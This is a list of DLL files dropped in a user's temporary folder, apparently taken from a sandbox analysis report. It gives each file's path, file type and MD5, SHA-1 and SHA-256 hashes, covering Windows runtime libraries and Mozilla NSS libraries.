C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	94AE25C7A5497CA0BE6882A00644CA64	F7AC28BBC47E46485025A51EEB6C304B70CEE215	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E2F648AE40D234A3892E1455B4DBBE05	D9D750E828B629CFB7B402A3442947545D8D781B	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E479444BDD4AE4577FD32314A68F5D28	77EDF9509A252E886D4DA388BF9C9294D95498EB	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6DB54065B33861967B491DD1C8FD8595	ED0938BBC0E2A863859AAD64606B8FC4C69B810A	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	2EA3901D7B50BF6071EC8732371B821C	E7BE926F0F7D842271F7EDC7A4989544F4477DA7	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D97A1CB141C6806F0101A5ED2673A63D	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0873E21721D04E20B6FFB038ACCF2F1	9E39E505D80D67B347B19A349A1532746C1F7F88	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	EFF11130BFE0D9C90C0026BF2FB219AE	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D500D9E24F33933956DF0E26F087FD91	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6F6796D1278670CCE6E2D85199623E27	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5F73A814936C8E7E4A2DFD68876143C8	D960016C4F553E461AFB5B06B039A15D2E76135E	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2D7D7711F9C0E3E065B2929FF342666	A17B1F36E73B82EF9BFB831058F187535A550EB8	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0289835D97D103BAD0DD7B9637538A1	8CEEBE1E9ABB0044808122557DE8AAB28AD14575	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEE0926AA1BF00F2BEC9DA5DB7B2DE56	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FDBA0DB0A1652D86CD471EAA509E56EA	3197CB45787D47BAC80223E3E98851E48A122EFA	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	12CC7D8017023EF04EBDD28EF9558305	F859A66009D1CAAE88BF36B569B63E1FBDAE9493	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	71AF7ED2A72267AAAD8564524903CFF6	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0D1AA99ED8069BA73CFD74B0FDDC7B3A	BA1F5384072DF8AF5743F81FD02C98773B5ED147	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	19A40AF040BD7ADD901AA967600259D9	05B6322979B0B67526AE5CD6E820596CBE7393E4	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	BABF80608FD68A09656871EC8597296C	33952578924B0376CA4AE6A10B8D4ED749D10688	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0F079489ABD2B16751CEB7447512A70D	679DD712ED1C46FBD9BC8615598DA585D94D5D87	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6EA692F862BDEB446E649E4B2893E36F	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	72E28C902CD947F9A3425B19AC5A64BD	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	AC290DAD7CB4CA2D93516580452EDA1C	FA949453557D0049D723F9615E4F390010520EDA	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	AEC2268601470050E62CB8066DD41A59	363ED259905442C4E3B89901BFD8A43B96BF25E4	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	93D3DA06BF894F4FA21007BEE06B5E7D	1E47230A7EBCFAF643087A1929A385E0D554AD15	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2F2258C32E3BA9ABF9E9E38EF7DA8C9	116846CA871114B7C54148AB2D968F364DA6142F	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8B0BA750E7B15300482CE6C961A932F0	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	35FC66BD813D0F126883E695664E7B83	2FD63C18CC5DC4DEFC7EA82F421050E668F68548	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	9910A1BFDC41C5B39F6AF37F0A22AACD	47FA76778556F34A5E7910C816C78835109E4050	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8D02DD4C29BD490E672D271700511371	F3035A756E2E963764912C6B432E74615AE07011	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	41A348F9BEDC8681FB30FA78E45EDB24	66E76C0574A549F293323DD6F863A8A5B54F3F9B	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEFB98394CB9EF4368DA798DEAB00E21	316D86926B558C9F3F6133739C1A8477B9E60740	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	404604CD100A1E60DFDAF6ECF5BA14C0	58469835AB4B916927B3CABF54AEE4F380FF6748	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	849F2C3EBF1FCBA33D16153692D5810F	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	B52A0CA52C9C207874639B62B6082242	6FB845D6A82102FF74BD35F42A2844D8C450413B	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	343AA83574577727AABE537DCCFDEAFC	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	9E682F1EB98A9D41468FC3E50F907635	85E0CECA36F657DDF6547AA0744F0855A27527EE	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	109F0F02FD37C84BFC7508D4227D7ED5	EF7420141BB15AC334D3964082361A460BFDB975	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
C:\Users\user\AppData\Local\Temp\2fda\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	556EA09421A0F74D31C4C0A89A70DC23	F739BA9B548EE64B13EB434A3130406D23F836E3	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	569A7A65658A46F9412BDFA04F86E2B2	44CC0038E891AE73C43B61A71A46C97F98B1030D	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	67827DB2380B5848166A411BAE9F0632	F68F1096C5A3F7B90824AA0F7B9DA372228363FF	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D6326267AE77655F312D2287903DB4D3	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	7587BF9CB4147022CD5681B015183046	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D